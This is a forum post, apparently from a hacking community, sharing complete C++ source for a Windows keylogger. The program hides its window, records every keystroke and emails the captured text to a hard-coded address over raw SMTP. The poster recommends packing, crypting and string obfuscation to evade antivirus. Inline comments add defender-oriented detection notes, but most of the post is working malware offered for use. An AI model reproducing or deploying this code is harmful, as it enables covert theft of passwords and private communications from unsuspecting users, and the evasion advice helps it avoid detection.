OP 08 September, 2020 - 05:06 AM
Here's the code for my (simple) keylogger. Just threw this together in like 20 minutes, so please forgive the sloppy coding and/or bugs.
Just a naive approach on a keylogger, I'd recommend packing or crypting it (although it shouldn't be detected by itself) and adding protection against static analysis such as XOR'ing the strings.
It would of course be smart to change your email servers etc...
Anyway, if you like it give me popularity or say thanks or something, idk.
Just a naive approach on a keylogger, I'd recommend packing or crypting it (although it shouldn't be detected by itself) and adding protection against static analysis such as XOR'ing the strings.
It would of course be smart to change your email servers etc...
Anyway, if you like it give me popularity or say thanks or something, idk.
Code:
#define _CRT_SECURE_NO_WARNINGS
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <WS2tcpip.h>
#include <thread>
#include <string>
#pragma comment (lib, "ws2_32.lib")
#pragma warning(disable : 6387)
// Size in bytes of the heap buffer that send_mail allocates for SMTP server
// replies; also the maximum length passed to every recv() call.
const int buf_size = 8192;
// Number of accumulated characters in the capture string at which main()
// hands the text to send_mail and clears it.
const int log_len = 128;
// Writes one protocol line to `sock`, then performs a single recv() of up to
// buf_size bytes into `buf`.
//   sock - connected socket.
//   line - text to transmit; sent up to its first NUL byte (strlen).
//   buf  - caller-owned buffer of at least buf_size bytes; overwritten with the reply.
// The return values of send() and recv() are discarded, so the server's reply
// code is never inspected and the received bytes are not NUL-terminated here.
void send_rcv(SOCKET sock, std::string line, char*& buf) { send(sock, line.c_str(), strlen(line.c_str()), 0); recv(sock, buf, buf_size, 0); }
// Delivers `mail_message` as the body of one e-mail by opening a raw TCP
// connection to the hard-coded mail host and issuing SMTP commands by hand.
//   mail_message - text placed after the To/From/Subject header lines.
// Any failure in start-up, name resolution, socket creation or connect ends
// the whole process via exit(-1).
//
// NOTE(review), defender's view: the network behaviour visible in this function
// is a non-mail process resolving a mail-exchanger hostname and connecting
// straight to TCP port 25, with no STARTTLS and no authentication in the
// dialogue, so the payload crosses the network in clear text. Blocking outbound
// port 25 from workstations at the egress firewall stops this delivery path,
// and alerting on such connections from unexpected processes surfaces it.
void send_mail(std::string mail_message) {
// Hard-coded destination host, envelope addresses and subject line. The two
// address literals appear already redacted in this listing.
static const std::string mail_server = "gmail-smtp-in.l.google.com";
static const std::string mail_to = "[email protected]";
static const std::string mail_from = "[email protected]";
static const std::string mail_subject = "logger report";
SOCKET sock;
WSADATA wsa_data;
struct hostent* host;
struct sockaddr_in dest_addr;
std::string line;
// Reply buffer shared by every send_rcv call below; the allocation result is not checked.
char* buf = (char*)malloc(buf_size + 1);
// Initialise Winsock 2.2, then resolve the mail host name (generates a DNS lookup).
if (WSAStartup(MAKEWORD(2, 2), &wsa_data) == SOCKET_ERROR) { WSACleanup(); exit(-1); }
if ((host = gethostbyname(mail_server.c_str())) == NULL) { WSACleanup(); exit(-1); }
// Build the destination address from the first resolved address, port 25 (SMTP).
memset(&dest_addr, 0, sizeof(dest_addr));
memcpy(&(dest_addr.sin_addr), host->h_addr, host->h_length);
dest_addr.sin_family = host->h_addrtype;
dest_addr.sin_port = htons(25);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { exit(-1); }
if (connect(sock, (struct sockaddr*) & dest_addr, sizeof(dest_addr)) == -1) { exit(-1); }
// Read the server greeting; its content is not examined.
recv(sock, buf, buf_size, 0);
// Plain SMTP dialogue. Each step sends one command and reads one reply, and
// no reply is checked before the next command is sent.
send_rcv(sock, "helo name.your.tld\n", buf);
send_rcv(sock, "MAIL FROM:<" + mail_from + ">\n", buf);
send_rcv(sock, "RCPT TO:<" + mail_to + ">\n", buf);
send_rcv(sock, "DATA\n", buf);
// Header lines, then the message text, then the "\r\n.\r\n" end-of-data marker.
// The fixed subject string is a stable content indicator for mail-side filtering.
send_rcv(sock, "To:" + mail_to + "\n" + "From:" + mail_from + "\n" + "Subject:" + mail_subject + "\n" + mail_message + "\r\n.\r\n", buf);
send_rcv(sock, "quit\n", buf);
// Normal-path cleanup only; the exit(-1) paths above skip it.
closesocket(sock);
WSACleanup();
free(buf);
}
// Entry point: hides the console window, then loops forever polling the
// keyboard state, appending a text rendering of each detected key press to
// `last_report` and passing that string to send_mail once it reaches log_len
// characters.
//
// NOTE(review), defender's view: the host-side behaviour visible here is a
// console process that hides its own window and then calls GetAsyncKeyState
// for every virtual-key code from 8 to 222 roughly every 10 ms. Endpoint
// monitoring that records API usage or input-polling behaviour can key on
// that pattern; nothing in this listing installs persistence or a hook.
int main(void)
{
// Hide the console window belonging to this process.
::ShowWindow(::GetConsoleWindow(), SW_HIDE);
std::string last_report;
// The first report begins with a start-time line (ctime() output ends in '\n').
time_t le_time = time(0);
last_report += "started logging at: " + std::string(ctime(&le_time));
while (1) {
std::this_thread::sleep_for(std::chrono::milliseconds(10));
// Scan virtual-key codes 8..222 once per wake-up.
for (short character = 8; character <= 222; character++) {
// -32767 is 0x8001 as a 16-bit value: high bit (key is down) and low bit
// (pressed since the previous call) both set.
if (GetAsyncKeyState(character) == -32767) {
// Codes 39..64 are appended as the raw character value; this range includes
// the digit keys. The `break` here leaves the for-loop for this wake-up.
if (character >= 39 && character <= 64) { last_report += (char)character; break; }
// Codes 65..90 (letter keys) are shifted by 32 to lower case before being
// appended; shift/caps state is not applied to the letter itself.
else if ((character > 64) && (character < 91)) { character += 32; last_report += (char)character; break; }
else {
// Remaining keys: printable ones are appended directly, others as a
// bracketed marker on its own line. Each `break` below leaves only the
// switch, so the scan continues with the next code.
switch (character) {
case VK_SPACE: last_report += ' '; break;
case VK_SHIFT: last_report += "\r\n[SHIFT]\r\n"; break;
case VK_RETURN: last_report += "\r\n[ENTER]\r\n"; break;
case VK_BACK: last_report += "\r\n[BACKSPACE]\r\n"; break;
case VK_TAB: last_report += "\r\n[TAB]\r\n"; break;
case VK_CONTROL: last_report += "\r\n[CTRL]\r\n"; break;
case VK_DELETE: last_report += "\r\n[DEL]\r\n"; break;
case VK_OEM_1: last_report += "\r\n[;:]\r\n"; break;
case VK_OEM_2: last_report += "\r\n[/?]\r\n"; break;
case VK_OEM_3: last_report += "\r\n[`~]\r\n"; break;
case VK_OEM_4: last_report += "\r\n[ [{ ]\r\n"; break;
case VK_OEM_5: last_report += "\r\n[\\|]\r\n"; break;
case VK_OEM_6: last_report += "\r\n[ ]} ]\r\n"; break;
case VK_OEM_7: last_report += "\r\n['\"]\r\n"; break;
case 187: last_report += '+'; break;
case 188: last_report += ','; break;
case 189: last_report += '-'; break;
case 190: last_report += '.'; break;
case VK_NUMPAD0: last_report += '0'; break;
case VK_NUMPAD1: last_report += '1'; break;
case VK_NUMPAD2: last_report += '2'; break;
case VK_NUMPAD3: last_report += '3'; break;
case VK_NUMPAD4: last_report += '4'; break;
case VK_NUMPAD5: last_report += '5'; break;
case VK_NUMPAD6: last_report += '6'; break;
case VK_NUMPAD7: last_report += '7'; break;
case VK_NUMPAD8: last_report += '8'; break;
case VK_NUMPAD9: last_report += '9'; break;
case VK_CAPITAL: last_report += "\r\n[CAPS LOCK]\r\n"; break;
}
}
}
}
// Once log_len characters have accumulated, mail the text and start over; the
// captured text is held only in memory and never written to disk in this code.
if (last_report.length() >= log_len) { send_mail(last_report); last_report.clear(); }
}
// Not reached: the while (1) loop above has no exit.
return EXIT_SUCCESS;
}